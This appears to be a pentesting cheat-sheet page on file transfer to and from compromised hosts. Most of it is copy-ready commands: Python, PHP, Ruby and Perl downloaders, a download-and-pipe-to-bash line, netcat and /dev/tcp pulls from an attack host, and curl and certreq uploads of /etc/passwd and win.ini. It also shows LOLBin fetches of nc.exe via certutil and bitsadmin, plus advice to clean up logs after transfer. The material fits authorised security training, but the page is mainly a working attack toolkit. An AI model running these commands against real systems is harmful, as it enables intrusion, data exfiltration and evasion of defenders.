Advanced File Transfer Techniques

Programming Language Methods

Python

# Python 2 Download
python2.7 -c 'import urllib; urllib.urlretrieve("URL", "output_file")'

# Python 3 Download
python3 -c 'import urllib.request; urllib.request.urlretrieve("URL", "output_file")'

# Python 3 Upload (requires requests)
python3 -c 'import requests; requests.post("http://<IP>:<PORT>/upload", files={"files": open("/path/to/file", "rb")})'

PHP

# Download with file_get_contents
php -r '$file = file_get_contents("URL"); file_put_contents("output_file", $file);'

# Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("URL", "rb"); $flocal = fopen("output_file", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'

# Download and Execute
php -r '$lines = @file("URL"); foreach ($lines as $line_num => $line) { echo $line; }' | bash

Ruby and Perl

# Ruby Download
ruby -e 'require "net/http"; File.write("output_file", Net::HTTP.get(URI.parse("URL")))'

# Perl Download
perl -e 'use LWP::Simple; getstore("URL", "output_file");'

Windows Scripting Methods

JavaScript (wget.js)

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), false);
WinHttpReq.Send();
var BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

Execute with: cscript.exe /nologo wget.js URL output_file

VBScript (wget.vbs)

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

Execute with: cscript.exe /nologo wget.vbs URL output_file

Netcat and Network Transfer Methods

Basic Netcat Transfer

# Receiver (Listening Mode)
nc -l -p 8000 > file_name.exe

# Sender
nc -q 0 target_IP 8000 < file_name.exe

Ncat with Enhanced Features

# Receiver
ncat -l -p 8000 --recv-only > file_name.exe

# Sender
ncat --send-only target_IP 8000 < file_name.exe

Alternative Methods

# Listen on Attack Host
sudo nc -l -p 443 -q 0 < file_name.exe

# Connect from Compromised Machine
nc attack_IP 443 > file_name.exe

# Using /dev/tcp (No Netcat)
cat < /dev/tcp/attack_IP/443 > file_name.exe

PowerShell Session File Transfer

WinRM Setup and Transfer

# Test Connection
Test-NetConnection -ComputerName target_name -Port 5985

# Create Session
$Session = New-PSSession -ComputerName target_name

# Transfer Files
Copy-Item -Path C:\localfile.txt -ToSession $Session -Destination C:\remote_path\
Copy-Item -Path "C:\remote_path\remote_file.txt" -Destination C:\local_path\ -FromSession $Session

Protected File Transfers

Windows Encryption

# Encrypt String
Invoke-AESEncryption -Mode Encrypt -Key "p@ssw0rd" -Text "Sensitive Data"

# Decrypt String
Invoke-AESEncryption -Mode Decrypt -Key "p@ssw0rd" -Text "<Encrypted_String>"

# Encrypt File
Invoke-AESEncryption -Mode Encrypt -Key "p4ssw0rd" -Path .\file.bin

# Decrypt File
Invoke-AESEncryption -Mode Decrypt -Key "p4ssw0rd" -Path .\file.bin.aes

Linux Encryption

# Encrypt File
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc

# Decrypt File
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd

HTTP/S File Upload Server

Nginx Upload Server Setup

# Create Upload Directory
sudo mkdir -p /var/www/uploads/SecretUploadDirectory
sudo chown -R www-data:www-data /var/www/uploads/SecretUploadDirectory

# Nginx Configuration (/etc/nginx/sites-available/upload.conf)
server {
    listen 9001;
    location /SecretUploadDirectory/ {
        root /var/www/uploads;
        dav_methods PUT;
    }
}

# Enable Configuration
sudo ln -s /etc/nginx/sites-available/upload.conf /etc/nginx/sites-enabled/
sudo systemctl restart nginx.service

# Test Upload
curl -T /etc/passwd http://localhost:9001/SecretUploadDirectory/users.txt

Living off The Land (LOLBins/GTFOBins)

Windows LOLBins Examples

# CertReq Upload
certreq.exe -Post -config http://<attack_IP>:8000/ C:\Windows\win.ini

# Bitsadmin Download
bitsadmin /transfer myJobName /priority foreground http://<attack_IP>:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe

# Certutil Download
certutil.exe -verifyctl -split -f http://<attack_IP>:8000/nc.exe

# PowerShell BITS
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<attack_IP>:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"

Linux GTFOBins Examples

# OpenSSL Transfer
# On Attack Host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/LinEnum.sh

# On Target
openssl s_client -connect <attack_IP>:80 -quiet > LinEnum.sh

Best Practices

Security Considerations
- Always encrypt sensitive data before transfer
- Use secure protocols when available (HTTPS, SFTP, SSH)
- Clean up files and logs after transfer
Protocol Selection
- Consider firewall restrictions
- Use commonly allowed protocols (HTTP/HTTPS)
- Have multiple methods ready as backup
Authentication and Access
- Use strong, unique passwords for encrypted transfers
- Remove temporary access after transfer completion
- Monitor for security alerts during transfer
Testing and Verification
- Verify file integrity after transfer
- Test transfer methods in lab environment first
- Document successful methods for future reference

PreviousFile Transfer Techniques for Pentesting NextFile Transfer Detection & Evasion Techniques

hashtagProgramming Language Methods

hashtagPython

hashtagPHP

hashtagRuby and Perl

hashtagWindows Scripting Methods

hashtagJavaScript (wget.js)

hashtagVBScript (wget.vbs)

hashtagNetcat and Network Transfer Methods

hashtagBasic Netcat Transfer

hashtagNcat with Enhanced Features

hashtagAlternative Methods

hashtagPowerShell Session File Transfer

hashtagWinRM Setup and Transfer

hashtagProtected File Transfers

hashtagWindows Encryption

hashtagLinux Encryption

hashtagHTTP/S File Upload Server

hashtagNginx Upload Server Setup

hashtagLiving off The Land (LOLBins/GTFOBins)

hashtagWindows LOLBins Examples

hashtagLinux GTFOBins Examples

hashtagBest Practices

Programming Language Methods

Python

PHP

Ruby and Perl

Windows Scripting Methods

JavaScript (wget.js)

VBScript (wget.vbs)

Netcat and Network Transfer Methods

Basic Netcat Transfer

Ncat with Enhanced Features

Alternative Methods

PowerShell Session File Transfer

WinRM Setup and Transfer

Protected File Transfers

Windows Encryption

Linux Encryption

HTTP/S File Upload Server

Nginx Upload Server Setup

Living off The Land (LOLBins/GTFOBins)

Windows LOLBins Examples

Linux GTFOBins Examples

Best Practices